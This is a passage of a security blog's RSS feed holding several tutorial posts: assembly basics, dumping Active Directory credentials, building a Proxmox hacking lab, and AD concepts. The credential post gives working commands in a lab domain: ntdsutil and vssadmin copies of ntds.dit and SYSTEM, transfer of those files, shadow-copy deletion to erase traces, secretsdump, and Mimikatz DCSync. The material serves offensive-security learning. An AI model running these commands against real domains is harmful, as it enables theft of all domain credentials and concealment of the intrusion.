In the ballet of conditional jumps, a crucial element steals the spotlight—meet the &quot;flags.&quot; These are housed in the special register, eflags for x32 or rflags for x64. Each bit in this register encapsulates control information, an orchestra of signals that various instructions can interpret.

One star among these flags is the &quot;zero flag,&quot; a prominent player in the drama of equality. When an operation results in 0—say, a subtraction in &quot;sub ebx, eax&quot;—the zero flag takes center stage, setting itself to 1. Enter the &quot;je&quot; instruction, which keenly observes this flag. If the subtraction yields equality (zero flag set to 1), &quot;je&quot; gracefully takes its cue, changing the instruction pointer to the memory address it signifies.

```nasm
sub ebx, eax
je 804833C

```

![](/content/images/2023/01/jump-1-.png)

# Conclusions

And with that, we draw the curtain on the inaugural chapter of our Binary Exploitation journey! 🎉 In this act, we navigated the intricate landscape of assembly code, exploring the elegant dance of instructions, registers, and the magic of memory.

But fear not, for the stage is set for the next chapter. Join me as we unravel the secrets of function conventions and tiptoe into the captivating realm of reverse engineering. It&apos;s a promise of more revelations and a deeper dive into the fascinating world of binary exploits.

I trust you enjoyed this opening act, and I eagerly await our next rendezvous. Until then, happy coding, and see you in the next installment! 😊🔍

# Resources

[Nightmare - Nightmare](https://guyinatuxedo.github.io/index.html)

[Guía de auto-estudio para la escritura de exploits · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/)</content:encoded><author>Ruben Santos</author></item><item><title>Unveiling the Secrets of Domain Controllers: A Journey into Active Directory Security</title><link>https://www.kayssel.com/post/active-directory-2-computers</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-2-computers</guid><description>Introduction In this journey through Active Directory security, we immerse ourselves in the pivotal role of Domain Controllers (DC). Positioned as central servers housing Active Directory Domain Services (AD DS), DCs play a fundamental role in maintaining the New Technologies Directory Services (...</description><pubDate>Fri, 20 Jan 2023 10:30:54 GMT</pubDate><content:encoded># Introduction

In this journey through Active Directory security, we immerse ourselves in the pivotal role of Domain Controllers (DC). Positioned as central servers housing Active Directory Domain Services (AD DS), DCs play a fundamental role in maintaining the New Technologies Directory Services (NTDS) database. Not only do they oversee the database, but they also orchestrate authorization, authentication, and various essential services within the domain.

# Domain Controllers

The NTDS database, located at &quot;C:\\Windows\\NTDS,&quot; contains essential domain objects. Infiltrating this fortress through access to the NTDS file presents a substantial threat to the entire domain. It is crucial to comprehend interconnected services like DNS, LDAP, and SMB, among others, to ensure secure access to NTDS data. If these terms are unfamiliar, fret not—we&apos;ll delve into them in future articles, providing a comprehensive understanding of their roles and significance

![](/content/images/2023/01/DCActualizacion-2.png)

Diagram to show how to update the NTDS

## Discovery Domain Controllers

Locating Domain Controllers within a domain is paramount. A non-intrusive method involves a DNS query using the nslookup tool. This query seeks servers with the Lightweight Directory Access Protocol (LDAP) service open, providing vital information about Domain Controllers.

```cmd
C:\Users\Administrator&gt;nslookup -q=srv _ldap._tcp.dc._msdcs.shadow.local
Server:  UnKnown
Address:  ::1

_ldap._tcp.dc._msdcs.shadow.local	SRV service location:
	 priority       = 0
	 weight         = 100
	 port           = 389
	 svr hostname   = DC-SHADOW.SHADOW.local
DC-SHADOW.SHADOW.local	internet address = 192.168.253.130

```

An alternative, slightly more intrusive, approach involves using nmap to scan for LDAP port 389 openness.

```cmd
┌──(rsgbengi㉿kali)-[~]
└─$ sudo nmap -sS --open -p389 192.168.253.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 10:54 CET
Nmap scan report for 192.168.253.130
Host is up (0.00023s latency).

PORT    STATE SERVICE
389/tcp open  ldap
MAC Address: 42:5A:97:56:1E:F6 (Unknown)

Nmap done: 256 IP addresses (3 hosts up) scanned in 3.86 seconds

```

For those who have compromised a user account, the nltest tool becomes handy in listing Domain Controllers.

```cmd
C:\Users\Administrator&gt; nltest /dclist:shadow.local
Get list of DCs in domain &apos;shadow.local&apos; from &apos;\\DC-SHADOW.SHADOW.local&apos;.
    DC-SHADOW.SHADOW.local [PDC]  [DS] Site: Default-First-Site-Name
&lt;details&gt;
&lt;summary&gt;The command completed successfully&lt;/summary&gt;

```

# **Dumping the NTDS: Unlocking the Heart of Active Directory**

At the core of Active Directory lies the NTDS. Understanding how to obtain information from it becomes crucial. To dump the domain database, we have two main methods: one from the Domain Controller itself using tools like ntdsutil.exe or vssadmin, and another online using tools like impacket&apos;s secretsdump script or mimikatz with the lsadump::dsync command.

## **Dump from Domain Controller: Utilizing ntds.exe**

Utilizing ntdsutil.exe allows us to save a snapshot of the database status, as demonstrated by the following command:

```powershel
&lt;/details&gt;

powershell &quot;ntdsutil.exe &apos;ac i ntds&apos; &apos;ifm&apos; &apos;create full c:\temp&apos; q q&quot;
```

In the screenshot above, the issued command performs a pivotal task: creating a copy of the NTDS and subsequent copies of the SYSTEM and SECURITY registry hives. While I&apos;ll delve into the intricacies of the SECURITY hive in forthcoming articles, the focus here is on the SYSTEM hive, housing the indispensable Syskey/BootKey. This key plays a paramount role in the decryption process, which unfolds across multiple levels:

1.  **First Level:** Decrypt the Password Encryption Key (PEK). The PEK is initially encrypted with the BootKey using RC4.
2.  **Second Level:** Initiate the first phase of decrypting hashes with the PEK using RC4.
3.  **Third Level:** Progress to the second phase of decrypting hashes using DES.

Acquiring the BootKey becomes the linchpin in this process. Once obtained, we gain the ability to decrypt the NTDS content, courtesy of accessing the PEK value. Remarkably, the PEK maintains a uniform value across all Domain Controllers. In contrast, the BootKey varies for each computer, underscoring its unique significance in this intricate decryption dance.

![](/content/images/2023/01/image-44.png)

Sample execution of ntds.exe

To access the Domain Controller, we leverage the smbclient tool from Impacket on our Kali Linux machine within the lab. This tool facilitates seamless file downloads from the remote machine, enhancing our control and maneuverability in the process.

![](/content/images/2023/01/image-46.png)

Smbclient sample

By employing the secretsdump script, we execute an NTDS dump with a focus on the SYSTEM hive. This strategic dump empowers us to harvest valuable information, including domain users, alongside their corresponding NTLM hashes and Kerberos keys.

![](/content/images/2023/01/image-45.png)

Secretsdump sample

## **Copy NTDS using Volume Shadow Copy service: A Stealthy Approach**

To duplicate the NTDS database through the Volume Shadow Copy service, we harness the functionalities of VSS—an ingenious service enabling the creation of backup copies of volumes even as applications actively engage with and write to them. For this task, Windows offers the vssadmin tool, a reliable ally in our data replication endeavors. Before embarking on the volume copy operation, it&apos;s imperative to ensure the presence of the desired files. Typically, NTDS takes residence in &quot;C:\\Windows\\NTDS\\ntds.dit,&quot; while the SYSTEM file finds its abode in &quot;C:\\Windows\\System32\\config\\SYSTEM.&quot;

```cmd
vssadmin create shadow /for=C:

```

This will give us the result shown in the following capture:

![](/content/images/2023/01/image-47.png)

Shadow copy creation

Upon the completion of the copy process, we proceed to duplicate the specific files of interest—namely, NTDS.dit and SYSTEM.

```cmd
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\system C:\system

```

![](/content/images/2023/01/image-48.png)

Copy the files we are interested in from shadow copy

![](/content/images/2023/01/image-49.png)

Sample of the technique&apos;s effectiveness

To transfer the desired files to our Kali Linux machine, we can utilize smbclient once again. Following the file transfer, it is imperative to erase any traces of the intrusion by removing the shadow copy.

```cmd
vssadmin list shadows
vssadmin delete shadows /Shadow={id}

```

![](/content/images/2023/01/image-50.png)

Removal of shadow copy to erase evidence of the intrusion

## **Remote Credential Dump: The Dcsync Technique**

In the realm of cybersecurity, the technique known as &quot;Dcsync&quot; emerges as a potent method for acquiring NTDS credentials, allowing access to hashes for domain accounts without the need for direct interaction with a domain controller or the extraction of the NTDS database.

As we explored in the &quot;Domain Controllers&quot; section, each DC houses a synchronized copy of the NTDS, perpetually updated across all DCs to reflect changes. Leveraging this synchronization capability, the Dcsync technique empowers an attacker to pose as a DC, initiating requests to the Windows API for Active Directory synchronization and replication. Specifically, the DSGetNCChanges function within DRSUAPI plays a pivotal role in this Directory Replication Service (DRS) protocol.

What adds to the intrigue is the fact that it can be executed from virtually any machine, granted the user possesses the requisite permissions—&quot;Replicating Directory Changes All&quot; and &quot;Replicating Directory Change.&quot; Typically, this technique finds its prime application in scenarios involving a domain administrator, naturally endowed with these privileges.

**However, a note of caution is warranted. Deploying this technique recklessly, especially in expansive domains, may trigger memory overload on the responding DC, potentially resulting in a crash. Prudent execution is key to navigating the power of Dcsync effectively.**

![](/content/images/2023/01/dcsync.png)

Dcsync Technique

### Using secretsdump

To employ this technique, the impacket&apos;s secretsdump script becomes a valuable ally once again. What sets this script apart is its versatility—you don&apos;t necessarily need a compromised Windows machine to execute it. Operating seamlessly from your Kali Linux, the secretsdump script unfolds a treasure trove of critical information. Fear not if the intricacies seem daunting at first; we&apos;ll delve into each facet in due course:

-   LM and NT password hashes
-   Passwords stored with reversible encryption
-   Kerberos keys (DES, AES128, and AES256)
-   Secrets of the Domain Controller&apos;s SAM
-   Insights into the Domain Controller&apos;s LSA

This arsenal of data, extracted through the secretsdump script, unveils the intricate layers of security measures employed within the Active Directory environment. Stay with me, and we&apos;ll demystify each element as we progress.

![](/content/images/2023/01/image-57.png)

NTDS dump via secretsdump remotely

### Mimikatz

Initiating this journey involves logging in with a user endowed with domain administrator privileges. Navigate to the core of your domain control: Tools &gt; Active Directory Users and Computers &gt; Users. Select your chosen user, right-click, and delve into the &quot;Add to a group...&quot; option. In this pivotal juncture, explicitly express your intention to enroll this user into the esteemed Domain Admins group. This strategic move empowers your user with the essential authority for the upcoming tasks. Let&apos;s choreograph this ascent to administrator prowess seamlessly.

![](/content/images/2023/01/image-63.png)

Add a user to the Domain Admins group

After successfully granting this group, validate the meticulous modifications to privileges with a command that speaks volumes:

```cmd
whoami /groups

```

![](/content/images/2023/01/image-65.png)

Verification that the user is Domain Admin

This insightful command unveils the transformed landscape of privileges, affirming the ascendancy and confirming the strategic enhancements made to bolster your group&apos;s authority. Dive into the realm of elevated privileges with confidence, as you navigate the path of administrative empowerment.

Embarking on the journey with Mimikatz requires a crucial step – the upload of this potent tool onto the target machine. In this tactical maneuver, the smbclient script emerges as your ally, wielding the &apos;put&apos; function to seamlessly transport Mimikatz to its designated destination.

```cmd
┌──(rsgbengi㉿kali)-[~/Downloads/x64]
└─$ impacket-smbclient Administrator@192.168.253.131
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
Type help for list of commands
# use C
# cd Users
# cd vaan
# cd Desktop
# put mimikatz.exe

```

Now that the pieces are in place, the stage is set for the grand unveiling. Execute Mimikatz with the following command:

```cmd
lsadump::DCSync /domain:shadow.local /user:vaan

```

With this command, the curtains rise on a spectacle of information, revealing a treasure trove of insights:

-   User account information (SAM username, account type, account options...)
-   Security ID (SID) and Relative ID (RID)
-   Kerberos Keys
-   Plaintext password if the account has reversible encryption enabled.

Mimikatz, now in the spotlight, orchestrates this revelation with finesse, extracting critical details that cast a spotlight on the security landscape. The command becomes the key to unlocking a realm of knowledge, offering a panoramic view of the domain&apos;s inner workings.

![](/content/images/2023/01/image-64.png)

Using mimikatz to obtan data from the NTDS

# Conclusion

In conclusion, understanding the intricacies of Domain Controllers and the methods employed to extract information from the NTDS database is vital in fortifying Active Directory security. As we navigate through tools and techniques, always remember the ethical implications of these actions and execute them within legal boundaries.

# References

[Dumping Domain Controller Hashes Locally and Remotely - Red Team Notes](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration)

[Credential Dumping: NTDS.dit - Hacking Articles](https://www.hackingarticles.in/credential-dumping-ntds-dit/)

[NTDS.DIT – Penetration Testing Lab](https://pentestlab.blog/tag/ntds-dit/)

&gt; [Mimikatz DCSync Usage, Exploitation, and Detection](https://adsecurity.org/?p=1729)



[Hacking Windows: Ataques a sistemas y redes Microsoft](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)</content:encoded><author>Ruben Santos</author></item><item><title>Building Your Hacking Playground: Proxmox Unveiled and Windows Symphony</title><link>https://www.kayssel.com/post/offensive-security-lab-1</link><guid isPermaLink="true">https://www.kayssel.com/post/offensive-security-lab-1</guid><description>Introduction Welcome to the kickoff of our series, where I&apos;ll guide you through the art of setting up a dynamic hacking practice environment. This first post is all about laying the groundwork for a potent Windows hacking practice arena using Proxmox. Excitingly, in the chapters to come, we&apos;ll un...</description><pubDate>Fri, 13 Jan 2023 11:00:39 GMT</pubDate><content:encoded># Introduction

Welcome to the kickoff of our series, where I&apos;ll guide you through the art of setting up a dynamic hacking practice environment. This first post is all about laying the groundwork for a potent Windows hacking practice arena using Proxmox. Excitingly, in the chapters to come, we&apos;ll unravel advanced configurations, network optimizations, and ventures into realms like pivoting and web hacking.

# **Unveiling Proxmox**

Proxmox, our secret weapon, stands for a type-1 hypervisor—a sophisticated software allowing multiple Virtual Machines (VMs) to gracefully share the stage on a single computer, utilizing its resources with finesse. Think of it as a maestro orchestrating a symphony of VMs. Unlike its counterparts, such as VirtualBox or VMWare Workstation, Proxmox operates on a higher plane, making it the virtuoso of hypervisors.

![](/content/images/2023/01/hypervisor.png)

Difference between hypervisor type 1 and type 2

# Embarking on level 1 lab setup

For our maiden voyage into the hacking cosmos, I&apos;ve chosen my humble home network. Through the magic of Dynamic Host Configuration Protocol (DHCP), our router will bestow IPs upon the virtual machines residing on the Proxmox stage—an old yet robust laptop boasting 16 GB of RAM and a 1-terabyte SSD. The more brawn your device flexes, the grander the virtual ensemble you can orchestrate. For our inaugural symphony of hacking techniques, you&apos;ll need a machine capable of harmonizing two Windows virtuosos, one Domain Controller maestro, and a Linux soloist—the attacker.

![](/content/images/2023/01/homeLab.png)

Lab that I am going to set up

# Setting the Proxmox Stage

To achieve this symphonic feat, follow the steps in NetworkChuck&apos;s video for a graceful Proxmox installation and setup. Once the curtains rise, access the Proxmox control panel via the web.

![](/content/images/2023/01/image.png)

Proxmox control panel

With our groundwork complete, the next act involves uploading the essential ISOs for our virtual machines. Navigate to pve &gt; local (pve) &gt; Upload to initiate this crucial step. Ensure you upload the respective ISOs for both the Windows 10 and Windows Server 2019 machines, setting the stage for a seamless performance.

For the orchestration of Windows machines, installing VirtIO drivers is paramount. To achieve this, we&apos;ll utilize the VirtIO ISO. Find the download link in the dedicated links section. When accessing the GitHub webpage, opt for the latest version, as illustrated in the accompanying image. This strategic choice ensures we harness the most refined tools for our virtual symphony.

![](/content/images/2023/01/image-2.png)

VirtIO ISO download sample

# **Crafting the Windows Server 2019 Symphony**

Compose the virtual machine with a name that resonates with you, harmonizing CPU and memory with your machine&apos;s capabilities. Meticulously configure each tab, ensuring a seamless performance.

![](/content/images/2023/11/image-63.png)

General tab

![](/content/images/2023/11/image-64.png)

OS tab

![](/content/images/2023/11/image-65.png)

System tab

![](/content/images/2023/11/image-66.png)

Disks tab

![](/content/images/2023/11/image-67.png)

CPU tab

![](/content/images/2023/11/image-68.png)

Memory tab

![](/content/images/2023/11/image-69.png)

Network tab

![](/content/images/2023/11/image-70.png)

All the configuration

In the hardware tab, add the VirtIO ISO to infuse the magic of Windows drivers. After this configuration, your machine should run smoothly without a hitch.

![](/content/images/2023/01/image-10.png)

Add VirtIO ISO

Once in the domain controller configuration, select your preferred language and specify that you want to utilize &quot;Windows Server 2019 Standard Evaluation (Desktop Experience).&quot; This sets the stage for a robust and user-friendly server environment.

![](/content/images/2023/01/image-11.png)

Selection of the Windows Server version to be installed

Next, opt to configure the operating system installation by selecting &quot;Custom: Install Windows only (advanced).&quot; A menu will appear, prompting you to click on &quot;browse&quot; for driver selection. Choose disk D, which houses the driver image, and then select the 2019 drivers from the &quot;virtio&quot; folder. This careful driver orchestration ensures a flawless installation process.

![](/content/images/2023/11/image-71.png)

Driver search

![](/content/images/2023/11/image-72.png)

Disk D

![](/content/images/2023/11/image-73.png)

Drivers selection

Click &apos;Next&apos; to initiate the installation, and you should be presented with the space allocation for your machine (Driver 0). After completing the installation, proceed to create an administrator user. While security is paramount, for the purposes of our test lab, set a straightforward password, such as &quot;P@$$w0rd.&quot;

![](/content/images/2023/11/image-75.png)

Installation

![](/content/images/2023/11/image-76.png)

Driver 0

![](/content/images/2023/01/image-14.png)

Sample administrator user configuration

With these configurations in place, the next destination is the Domain Controller. Accessing the user login interface is a breeze – simply click on the button depicted in the image below, mirroring the familiar &quot;Ctrl+Alt+Delete&quot; sequence. This action seamlessly opens the gateway to the Domain Controller, paving the way for further exploration within our orchestrated environment.

![](/content/images/2023/01/image-15.png)

Access to the log in

Now, you&apos;ve successfully tuned the Windows Server 2019 machine to play its part in our hacking symphony.

# Windows 10: The crescendo

The Windows 10 symphony echoes similar notes of configuration. Compose the settings across General, OS, System, Disk, CPU, Memory, and Network tabs. Run the machine, initiating the configuration for language and keyboard preferences during the installation process.

![](/content/images/2023/11/image-77.png)

General tab

![](/content/images/2023/11/image-78.png)

OS tab

![](/content/images/2023/11/image-79.png)

System tab

![](/content/images/2023/11/image-80.png)

Disk tab

![](/content/images/2023/11/image-81.png)

CPU tab

![](/content/images/2023/11/image-82.png)

Memory tab

![](/content/images/2023/11/image-83.png)

Network tab

![](/content/images/2023/11/image-84.png)

Click again on &quot;Custom Installation,&quot; and this time, ensure that the disk where you want to install Windows is visible. If it doesn&apos;t appear, repeat the virtuoso act of loading the drivers, akin to our earlier steps with Windows Server 2019. This ensures a flawless installation process that resonates with perfection.

![](/content/images/2023/01/image-17.png)

Disk selection sample

Upon entering the system, revisit language and keyboard configuration. A dialog may appear, indicating a failure to connect to the internet. Fear not, and click on the option at the bottom left, stating &quot;I don&apos;t have Internet.&quot; In the subsequent dialog, choose &quot;Continue with limited setup.&quot; The virtual machine will restart, and you&apos;ll need to repeat this process to continue without internet. Select the option &quot;I don&apos;t have internet&quot; once again.

![](/content/images/2023/01/image-18.png)

Select the option &quot;I don&apos;t have internet&quot;

![](/content/images/2023/01/image-19.png)

Select the option &quot;Continue with limited setup&quot;

Finally, establish credentials for the user that grants access to the machine. The following steps may be best ignored, as security configurations can vary. After completing these steps, revel in the crescendo as you gain access to your Windows 10 machine.

![](/content/images/2023/01/image-20.png)

Access to Windows 10 machine

To conclude this part of the lab, repeat this same process to create a second Windows 10 machine, adding another layer of harmony to our hacking symphony.

# Conclusions

This concludes the first part of our series! 🥳 In the next installment, we&apos;ll dive into setting up drivers for virtual machines to ensure network access. Additionally, we&apos;ll explore how to configure both the Domain Controller and Windows 10 machines to create a fully functional Windows hacking lab.

# Links

[virtio-win-pkg-scripts/README.md at master · virtio-win/virtio-win-pkg-scripts](https://github.com/virtio-win/virtio-win-pkg-scripts/blob/master/README.md)</content:encoded><author>Ruben Santos</author></item><item><title>Initiating the Active Directory Odyssey: Unveiling Key Concepts and Building the Foundations</title><link>https://www.kayssel.com/post/active-directory-1</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-1</guid><description>Introduction to the series Embark on a journey through the first post of this blog, where we unravel the intricacies of Active Directory. This topic, a personal favorite and a recurrent element in offensive security projects, takes center stage in our exploration. A year ago, I initiated the Igri...</description><pubDate>Fri, 06 Jan 2023 21:46:13 GMT</pubDate><content:encoded># Introduction to the series

Embark on a journey through the first post of this blog, where we unravel the intricacies of Active Directory. This topic, a personal favorite and a recurrent element in offensive security projects, takes center stage in our exploration. A year ago, I initiated the Igris project—a Python tool crafted to test Active Directory security. Currently paused for re-engineering in the nim programming language, it serves as a potential foundation for those keen on creating offensive security tools. The development of Igris not only provided valuable insights into these environments but also fueled my desire to fortify and expand my knowledge.

In this series, I will share a collection of articles covering various Active Directory topics as I encounter and learn them. For programming enthusiasts, I&apos;ll delve into the application of key Python libraries, demonstrating their utility in crafting practical tools for diverse scenarios. The exploration extends to both the Cmd console and the PowerShell console, showcasing methods to collect information on the discussed concepts.

I trust you will find this series both informative and enjoyable. Thanks for embarking on this learning journey with me! 😊

# **Things to Keep in Mind: Guiding Your Learning Path**

This series caters to individuals venturing into offensive security, with a specific focus on Active Directory. Our expedition will gradually venture into more technical terrain, starting with the fundamentals. Acknowledging my non-expert status, I believe this series can be particularly beneficial for those new to Active Directory, as the mistakes I encounter may resonate with others in the future.

For effective practice, consider setting up an Active Directory lab. I recommend The Cyber Mentor&apos;s video for lab creation. If you opt for a Proxmox server setup, refer to my blogs on this topic:

[Offensive Lab](https://www.kayssel.com/series/offensive-lab/)

How to set up an active directory environment to practice in vmware

Regarding Python, we won&apos;t cover basic language concepts. Instead, the focus will be on aspects of key libraries used. If you lack basic Python knowledge, numerous online tutorials are available. With these considerations in mind, let&apos;s dive into the series!

# **What is Active Directory?: Simplifying Centralized Management**

In essence, Active Directory is a system designed to centrally manage an organization&apos;s computers and users. To illustrate its advantages, consider the scenario of a new employee joining an organization and needing access to various computers. Without Active Directory, creating a user account on each computer becomes a laborious task. However, by connecting these computers to an Active Directory network, only one user account for the new employee needs creation in the centralized database. This streamlined process ensures access to all network-connected computers without individual account creation on each.

After this succinct overview, let&apos;s introduce key concepts essential for understanding Active Directory environments.

## **Key Concepts in Active Directory**

### **Domains**

In the realm of Active Directory, a domain is akin to the previously mentioned &quot;Active Directory network.&quot; It constitutes a collection of computers sharing the same centralized database, housed in a &quot;Domain Controller.&quot; Future posts will delve deeper into the intricacies of Domain Controllers. An essential concept is the domain name or DNS name, often identical to the organization&apos;s website. For example, a domain name might be kayssel.com, while an internal network domain could be shadow.local.

To determine the domain name to which a computer belongs, execute the following commands in the PowerShell console:

```powershell
PS C:\Users\beruinsect&gt; $env:USERDNSDOMAIN
SHADOW.LOCAL
PS C:\Users\beruinsect&gt; (Get-ADDomain).DNSRoot
shadow.local

```

### **Computers**

In Active Directory environments, a computer doubles as a user and must be connected to a Domain Controller to belong to it. Three types of computers exist:

1.  **Domain Controllers (DCs):** Central servers managing the domain, housing the centralized database. These servers run on Windows Server Machines.
2.  **Workstations:** Personal computers used daily, typically running on Windows 10 or Windows 11.
3.  **Servers:** Computers offering services like webs, files, or databases, usually running on Linux or Windows Server machines.

### Users

One of the main advantages of Active Directory is user management. As explained earlier, creating and configuring a user in the centralized database ensures changes affect all domain computers. All user data, residing in the centralized database, can be accessed from any domain point with the necessary permissions. Active Directory hosts two main user types: local users, with access limited to the machines on which they are created, and domain users, by default having access to all domain computers.

```bash
WORKGROUP/iron    #Local User
shadow.local/iron #Domain User

```

# **Lab Scheme: Navigating the Active Directory Learning Landscape**

Concluding this inaugural chapter, let&apos;s introduce the main components of the lab instrumental in learning about Active Directory. The lab domain, named shadow.local, utilizes the IP range 192.168.253.0/24. Within the domain are two workstations, one for user Beru and one for user Iron—both operating on Windows 10 and connected to the Dc-Shadow Domain Controller, which runs Windows Server 2019. These components set the stage for further exploration in upcoming posts.

![](/content/images/2023/01/componets.png)

Main laboratory components to be used in the following posts.

# References

The main references that I have found to learn how to attack Active Directory environments are the following and will be the ones I will use as a guide to learn more about these environments :)

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[Hacking Windows: Ataques a sistemas y redes Microsoft](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)

[Active Directory Security – Active Directory &amp; Enterprise Security, Methods to Secure Active Directory, Attack Methods &amp; Effective Defenses, PowerShell, Tech Notes, &amp; Geek Trivia…](https://adsecurity.org/)

[Blog](https://blog.harmj0y.net/blog/)

Feel free to explore and share your thoughts on specific sections you&apos;d like to delve into further!</content:encoded><author>Ruben Santos</author></item></channel></rss>